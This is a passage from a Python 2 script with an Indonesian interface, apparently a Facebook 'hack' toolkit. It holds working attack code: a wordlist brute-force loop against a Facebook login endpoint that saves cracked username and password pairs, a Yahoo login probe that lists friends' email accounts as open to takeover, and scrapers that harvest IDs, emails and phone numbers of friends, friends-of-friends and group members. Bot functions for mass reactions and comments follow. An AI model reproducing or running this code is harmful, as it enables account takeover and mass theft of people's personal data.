jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mMencoba \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Koneksi Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mIngin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Dari teman facebook'
print '\x1b[1;37;40m2. Gunakan File'
print '\x1b[1;31;40m0. Kembali'
print
yahoo_pilih()
def yahoo_pilih():
go = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Jangan kosong'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak ada'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(teman.text)
save = open('MailVuln.txt', 'w')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 40 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File tidak ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Ambil ID teman'
print '\x1b[1;37;40m2. Ambil ID teman dari teman'
print '\x1b[1;37;40m3. Ambil ID member GRUP'
print '\x1b[1;37;40m4. Ambil Email teman'
print '\x1b[1;37;40m5. Ambil Email teman dari teman'
print '\x1b[1;37;40m6. Ambil No HP teman'
print '\x1b[1;37;40m7. Ambil No HP teman dari teman'
print '\x1b[1;31;40m0. Kembali'
print
grab_pilih()
def grab_pilih():
cuih = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Jangan kosong'
grab_pilih()
else:
if cuih == '1':
id_teman()
else:
if cuih == '2':
idfrom_teman()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_teman()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_teman()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mTidak ada'
grab_pilih()
def id_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idteman.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def idfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromteman.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def emailfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromteman.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(emfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def hpfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hpfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Bot Reactions Target Post'
print '\x1b[1;37;40m2. Bot Reactions Grup Post'
print '\x1b[1;37;40m3. Bot Komen Target Post'
print '\x1b[1;37;40m4. Bot Komen Grup Post'
print '\x1b[1;37;40m5. Mass delete Post'
print '\x1b[1;37;40m6. Terima permintaan pertemanan'
print '\x1b[1;37;40m7. Hapus pertemanan'
print '\x1b[1;31;40m0. Kembali'
print
bot_pilih()
def bot_pilih():
bots = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Jangan kosong'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mTidak ada'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. \x1b[1;97mLike'
print '\x1b[1;37;40m2. \x1b[1;97mLove'
print '\x1b[1;37;40m3. \x1b[1;97mWow'
print '\x1b[1;37;40m4. \x1b[1;97mHaha'
print '\x1b[1;37;40m5. \x1b[1;97mSedih'
print '\x1b[1;37;40m6. \x1b[1;97mMarah'
print '\x1b[1;31;40m0. Kembali'
print
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Jangan kosong'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. \x1b[1;97mLike'
print '\x1b[1;37;40m2. \x1b[1;97mLove'
print '\x1b[1;37;40m3. \x1b[1;97mWow'
print '\x1b[1;37;40m4. \x1b[1;97mHaha'
print '\x1b[1;37;40m5. \x1b[1;97mSedih'
print '\x1b[1;37;40m6. \x1b[1;97mMarah'
print '\x1b[1;31;40m0. Kembali'
print
reactg_pilih()
def reactg_pilih():
